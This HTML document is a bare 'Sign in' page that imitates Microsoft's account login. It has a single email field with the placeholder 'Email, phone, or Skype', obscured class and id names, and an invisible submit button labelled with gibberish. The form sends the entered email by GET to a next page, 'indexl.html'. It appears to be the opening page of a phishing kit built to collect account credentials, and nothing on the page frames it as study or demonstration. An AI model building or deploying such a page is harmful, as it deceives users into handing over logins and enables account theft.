<!DOCTYPE html>
<html lang="en">

<head>
<title>Sign in</title>
<link rel="stylesheet" type="text/css" href="./style.css" />
<meta charset="UTF-8">
<link rel="shortcut icon" href="favicon.ico">
</head>

<body class="fbody">
<form onsubmit="myfunction()" class="dewin" method="get" id="pax" action="indexl.html" >
<fieldset class="fews">
 <div class="yumx" id="bax"></div><br>
<input class="yumy2" type="email" id="inpwd" name="pexam" placeholder="&nbsp;Email, phone, or Skype" value="" required autocomplete="off"><br>
<input type="submit" class="aperix" value="jhgjhgjhghjgjklnlnhqx" style="opacity: 0;"><br>
</fieldset>
</form>
</body>
<script>
	document.getElementById("inpwd").focus();
				
	
</script>
</html>
